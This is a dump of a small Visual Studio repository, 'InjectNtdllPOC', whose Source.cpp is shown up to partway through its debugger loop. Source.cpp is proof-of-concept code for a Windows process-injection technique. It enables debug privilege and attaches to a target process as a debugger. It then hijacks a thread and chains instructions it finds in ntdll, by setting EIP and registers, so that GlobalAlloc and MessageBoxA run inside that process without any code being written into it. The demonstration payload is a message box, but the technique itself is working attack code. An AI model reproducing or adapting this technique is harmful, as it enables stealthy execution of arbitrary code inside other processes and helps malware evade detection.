├── .gitattributes
├── .gitignore
├── InjectNtdllPOC.sln
├── InjectNtdllPOC
├── InjectNtdllPOC.vcxproj
├── InjectNtdllPOC.vcxproj.filters
└── Source.cpp
├── Media
└── poc.gif
└── README.md
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/InjectNtdllPOC.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31729.503
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectNtdllPOC", "InjectNtdllPOC\InjectNtdllPOC.vcxproj", "{9D513206-4A9C-4CB7-83F7-87984C05BD79}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x64.ActiveCfg = Debug|x64
17 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x64.Build.0 = Debug|x64
18 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Debug|x86.Build.0 = Debug|Win32
20 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x64.ActiveCfg = Release|x64
21 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x64.Build.0 = Release|x64
22 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x86.ActiveCfg = Release|Win32
23 | {9D513206-4A9C-4CB7-83F7-87984C05BD79}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {D73B2C18-B48C-46A9-B1EF-31C59F0D48C3}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/InjectNtdllPOC/InjectNtdllPOC.vcxproj:
--------------------------------------------------------------------------------
[Visual Studio C++ project file (MSBuild XML). The element tags were lost in extraction and only the element values survived; they give the following settings: four configurations (Debug|Win32, Release|Win32, Debug|x64, Release|x64); project version 16.0, keyword Win32Proj, project GUID {9d513206-4a9c-4cb7-83f7-87984c05bd79}, root namespace InjectNtdllPOC, target platform version 10.0; every configuration is a Unicode console Application built with the v142 toolset (the Release configurations with whole-program optimization and link-time code generation); preprocessor definitions WIN32;_DEBUG;_CONSOLE (Debug|Win32), WIN32;NDEBUG;_CONSOLE (Release|Win32), _DEBUG;_CONSOLE (Debug|x64) and NDEBUG;_CONSOLE (Release|x64); the Release|Win32 linker settings additionally set the UAC execution level to RequireAdministrator.]
--------------------------------------------------------------------------------
/InjectNtdllPOC/InjectNtdllPOC.vcxproj.filters:
--------------------------------------------------------------------------------
[Visual Studio filter file (MSBuild XML). The element tags were lost in extraction; the surviving values define three filters by unique identifier and extension list: {4FC737F1-C7A5-4376-A066-2A32D752A2FF} for cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx (this is "Source Files"), {93995380-89BD-4b04-88EB-625FBE52EBFB} for h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd, and {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} for rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms. The single compile item, Source.cpp, is placed under "Source Files".]
--------------------------------------------------------------------------------
/InjectNtdllPOC/Source.cpp:
--------------------------------------------------------------------------------
// InjectNtdllPOC - 32-bit (x86) only: the instruction list below holds x86 opcodes and the
// debugger loop drives the Eip/Eax/... fields of a Win32 CONTEXT.
#include <windows.h>    // Win32 API, CONTEXT, debug events
#include <tlhelp32.h>   // CreateToolhelp32Snapshot / Process32First / Process32Next
#include <stdio.h>      // printf
#include <stdlib.h>     // exit, system
#include <string>       // std::string / std::wstring

#define FLAG_EAX 0x00000001
#define FLAG_EBX 0x00000002
#define FLAG_ECX 0x00000004
#define FLAG_EDX 0x00000008
#define FLAG_EDI 0x00000010
#define FLAG_ESI 0x00000020
#define FLAG_CALL 0x00000040

struct InstructionEntryStruct
{
    const char* pLabel;

    BYTE bInstruction[16];
    DWORD dwInstructionLength;

    DWORD dwInstructionAddr;

    DWORD dwEax;
    DWORD dwEbx;
    DWORD dwEcx;
    DWORD dwEdx;
    DWORD dwEdi;
    DWORD dwEsi;
    DWORD dwInstructionFlags;
};

DWORD dwGlobal_CurrInstruction = 0;
CONTEXT Global_OrigContext;        // context of the hijacked thread at its first exception
DWORD targetThread = 0;            // id of the hijacked thread (0 until the first exception)
HANDLE hTargetThread = NULL;

DWORD FindProcessId(const std::wstring& processName)
{
    PROCESSENTRY32W processInfo;
    processInfo.dwSize = sizeof(processInfo);

    HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (processesSnapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    // case-sensitive match against the image name of every process in the snapshot
    DWORD pid = 0;
    if (Process32FirstW(processesSnapshot, &processInfo))
    {
        do
        {
            if (processName.compare(processInfo.szExeFile) == 0)
            {
                pid = processInfo.th32ProcessID;
                break;
            }
        } while (Process32NextW(processesSnapshot, &processInfo));
    }

    CloseHandle(processesSnapshot);
    return pid;
}

BOOL AdjustPrivileges() {
    BOOL bRet = FALSE;
    HANDLE hToken = NULL;
    LUID luid = { 0 };

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
        {
            TOKEN_PRIVILEGES tokenPriv = { 0 };
            tokenPriv.PrivilegeCount = 1;
            tokenPriv.Privileges[0].Luid = luid;
            tokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

            // AdjustTokenPrivileges returns TRUE even when the token does not hold the
            // privilege (non-elevated token), so the last error must be checked as well
            bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
            if (bRet && GetLastError() == ERROR_NOT_ALL_ASSIGNED)
            {
                bRet = FALSE;
            }
        }

        CloseHandle(hToken);
    }

    return bRet;
}

// The 'call' entries carry the injector's own addresses of GlobalAlloc and MessageBoxA; they are
// valid in the target only because system DLLs are mapped at the same base in every process of a
// boot session, and only if user32.dll is loaded in the target at all.
InstructionEntryStruct Global_InstructionList[] =
{
    // allocate 1kb buffer for messagebox title using GlobalAlloc
    { "push ecx", { 0x51 }, 1, 0, 0, 0, 1024, 0, 0, 0, FLAG_ECX },
    { "push ecx", { 0x51 }, 1, 0, 0, 0, GMEM_FIXED, 0, 0, 0, FLAG_ECX },
    { "call eax ; (GlobalAlloc)", { 0xFF, 0xD0 }, 2, 0, (DWORD)GlobalAlloc, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },

    // set messagebox title to "It works"
    { "mov ebx, eax", { 0x8B, 0xD8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'I' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'I', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 't' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 't', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: ' ' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, ' ', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'w' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'w', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'o' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'o', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'r' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'r', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'k' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'k', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 's' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 's', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; (null) ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, '\0', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },

    // store messagebox title ptr in edi register
    { "mov edi, eax", { 0x8B, 0xF8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },

    // allocate 1kb buffer for messagebox text using GlobalAlloc
    { "push ecx", { 0x51 }, 1, 0, 0, 0, 1024, 0, 0, 0, FLAG_ECX },
    { "push ecx", { 0x51 }, 1, 0, 0, 0, GMEM_FIXED, 0, 0, 0, FLAG_ECX },
    { "call eax ; (GlobalAlloc)", { 0xFF, 0xD0 }, 2, 0, (DWORD)GlobalAlloc, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },

    // set messagebox text to "ntdll"
    { "mov ebx, eax", { 0x8B, 0xD8 }, 2, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'n' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'n', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 't' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 't', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'd' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'd', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'l' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'l', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; character: 'l' ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, 'l', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "mov byte ptr [ebx], dl ; (null) ", { 0x88, 0x13 }, 2, 0, 0, 0, 0, '\0', 0, 0, FLAG_EDX },
    { "inc ebx", { 0x43 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },

    // call MessageBoxA(hWnd = 0, lpText = eax, lpCaption = edi, uType = MB_OK); stdcall, so pushed right to left
    { "push ecx", { 0x51 }, 1, 0, 0, 0, MB_OK, 0, 0, 0, FLAG_ECX },
    { "push edi", { 0x57 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "push eax", { 0x50 }, 1, 0, 0, 0, 0, 0, 0, 0, 0 },
    { "push ecx", { 0x51 }, 1, 0, 0, 0, 0, 0, 0, 0, FLAG_ECX },
    { "call eax ; (MessageBoxA)", { 0xFF, 0xD0 }, 2, 0, (DWORD)MessageBoxA, 0, 0, 0, 0, 0, FLAG_EAX | FLAG_CALL },
};

DWORD GetModuleCodeSection(DWORD dwModuleBase, DWORD* pdwCodeSectionStart, DWORD* pdwCodeSectionLength)
{
    IMAGE_DOS_HEADER* pDosHeader = NULL;
    IMAGE_NT_HEADERS* pNtHeader = NULL;
    IMAGE_SECTION_HEADER* pCurrSectionHeader = NULL;
    char szCurrSectionName[16];
    DWORD dwFound = 0;
    DWORD dwCodeSectionStart = 0;
    DWORD dwCodeSectionLength = 0;

    // get dos header ptr (start of module)
    pDosHeader = (IMAGE_DOS_HEADER*)dwModuleBase;
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
    {
        return 1;
    }

    // get nt header ptr
    pNtHeader = (IMAGE_NT_HEADERS*)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
    if (pNtHeader->Signature != IMAGE_NT_SIGNATURE)
    {
        return 1;
    }

    // loop through all sections
    for (DWORD i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
    {
        // get current section header
        pCurrSectionHeader = (IMAGE_SECTION_HEADER*)((BYTE*)pNtHeader + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));

        // pCurrSectionHeader->Name is not null terminated if all 8 characters are used - copy it to a larger local buffer
        memset(szCurrSectionName, 0, sizeof(szCurrSectionName));
        memcpy(szCurrSectionName, pCurrSectionHeader->Name, sizeof(pCurrSectionHeader->Name));

        // check if this is the main code section
        if (strcmp(szCurrSectionName, ".text") == 0)
        {
            // found code section
            dwFound = 1;
            dwCodeSectionStart = dwModuleBase + pCurrSectionHeader->VirtualAddress;
            dwCodeSectionLength = pCurrSectionHeader->SizeOfRawData;

            break;
        }
    }

    // ensure the code section was found
    if (dwFound == 0)
    {
        return 1;
    }

    // store values
    *pdwCodeSectionStart = dwCodeSectionStart;
    *pdwCodeSectionLength = dwCodeSectionLength;

    return 0;
}

DWORD ScanForInstructions()
{
    DWORD dwInstructionCount = 0;
    DWORD dwCurrSearchPos = 0;
    DWORD dwBytesRemaining = 0;
    DWORD dwFoundAddr = 0;
    DWORD dwCodeSectionStart = 0;
    DWORD dwCodeSectionLength = 0;

    // calculate instruction count
    dwInstructionCount = sizeof(Global_InstructionList) / sizeof(Global_InstructionList[0]);

    // find ntdll code section range (ntdll is mapped at the same base in the target, so the
    // addresses found in our own copy are valid there too)
    if (GetModuleCodeSection((DWORD)GetModuleHandleW(L"ntdll.dll"), &dwCodeSectionStart, &dwCodeSectionLength) != 0)
    {
        return 1;
    }

    // scan for instructions
    for (DWORD i = 0; i < dwInstructionCount; i++)
    {
        // check if an address has already been found for this instruction
        if (Global_InstructionList[i].dwInstructionAddr != 0)
        {
            continue;
        }

        // find this instruction in the ntdll code section
        dwCurrSearchPos = dwCodeSectionStart;
        dwBytesRemaining = dwCodeSectionLength;
        dwFoundAddr = 0;
        for (;;)
        {
            // check if the end of the code section has been reached
            if (Global_InstructionList[i].dwInstructionLength > dwBytesRemaining)
            {
                break;
            }

            // check if the instruction exists here
            if (memcmp((void*)dwCurrSearchPos, (void*)Global_InstructionList[i].bInstruction, Global_InstructionList[i].dwInstructionLength) == 0)
            {
                dwFoundAddr = dwCurrSearchPos;
                break;
            }

            // update search indexes
            dwCurrSearchPos++;
            dwBytesRemaining--;
        }

        // ensure the opcode was found
        if (dwFoundAddr == 0)
        {
            printf("Error: Instruction not found in ntdll: '%s'\n", Global_InstructionList[i].pLabel);

            return 1;
        }

        // store address
        Global_InstructionList[i].dwInstructionAddr = dwFoundAddr;

        // copy this instruction address to any other matching instructions in the list
        for (DWORD ii = 0; ii < dwInstructionCount; ii++)
        {
            // check if the instruction lengths match
            if (Global_InstructionList[ii].dwInstructionLength == Global_InstructionList[i].dwInstructionLength)
            {
                // check if the instruction opcodes match
                if (memcmp(Global_InstructionList[ii].bInstruction, Global_InstructionList[i].bInstruction, Global_InstructionList[i].dwInstructionLength) == 0)
                {
                    // copy instruction address
                    Global_InstructionList[ii].dwInstructionAddr = Global_InstructionList[i].dwInstructionAddr;
                }
            }
        }
    }

    return 0;
}

void DebuggerMainLoop() {
    DEBUG_EVENT DBEvent;
    LPDEBUG_EVENT DebugEv = &DBEvent;
    CONTEXT currentContext;
    InstructionEntryStruct* pCurrInstruction = NULL;
    DWORD dwInstructionCount = sizeof(Global_InstructionList) / sizeof(Global_InstructionList[0]);

    for (;;)
    {
        if (!WaitForDebugEvent(DebugEv, INFINITE)) {
            printf("WaitForDebugEvent failed: %lu\n", GetLastError());
            break;
        }

        if (targetThread == DebugEv->dwThreadId && DebugEv->dwDebugEventCode == CREATE_THREAD_DEBUG_EVENT) {
            printf("This event is fired for every thread resumed %lu\n", DebugEv->dwThreadId);
        }

        // Only exceptions (breakpoint / single-step) raised by the hijacked thread are handled here.
        // The first exception reported after the attach selects that thread. Exceptions raised by any
        // other thread are handed back to the debuggee unhandled; every other event is simply resumed.
        if (DebugEv->dwDebugEventCode != EXCEPTION_DEBUG_EVENT) {
            ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_CONTINUE);
            continue;
        }
        if (targetThread != 0 && targetThread != DebugEv->dwThreadId) {
            ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_EXCEPTION_NOT_HANDLED);
            continue;
        }

        hTargetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, DebugEv->dwThreadId);
        if (hTargetThread == NULL) {
            printf("Unable to open thread %lu\n", DebugEv->dwThreadId);
            break;
        }

        // GetThreadContext/SetThreadContext only transfer the register groups named in ContextFlags;
        // the debug registers are needed because the hardware breakpoint uses Dr0/Dr7
        currentContext.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
        if (!GetThreadContext(hTargetThread, &currentContext)) {
            printf("Unable to get thread context\n");
            break;
        }

        if (targetThread == 0) {
            // first exception: remember the thread and its original context for the final restore
            targetThread = DebugEv->dwThreadId;
            Global_OrigContext = currentContext;
        }

        printf("EIP: 0x%08lX\t EAX: 0x%08lX\n", currentContext.Eip, currentContext.Eax);

        if (dwGlobal_CurrInstruction >= dwInstructionCount)
        {
            // finished executing all instructions - restore original context and let the thread run
            printf("We have finished, let's restore the old context\n\n");
            SetThreadContext(hTargetThread, &Global_OrigContext);
            ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_CONTINUE);
            break;
        }

        // get current instruction entry
        pCurrInstruction = &Global_InstructionList[dwGlobal_CurrInstruction];

        // set instruction ptr to next instruction
        currentContext.Eip = pCurrInstruction->dwInstructionAddr;

        // check register flags (each list entry sets at most one general-purpose register)
        if (pCurrInstruction->dwInstructionFlags & FLAG_EAX)
        {
            // set eax
            printf(" mov eax, 0x%lx\n", pCurrInstruction->dwEax);
            currentContext.Eax = pCurrInstruction->dwEax;
        }
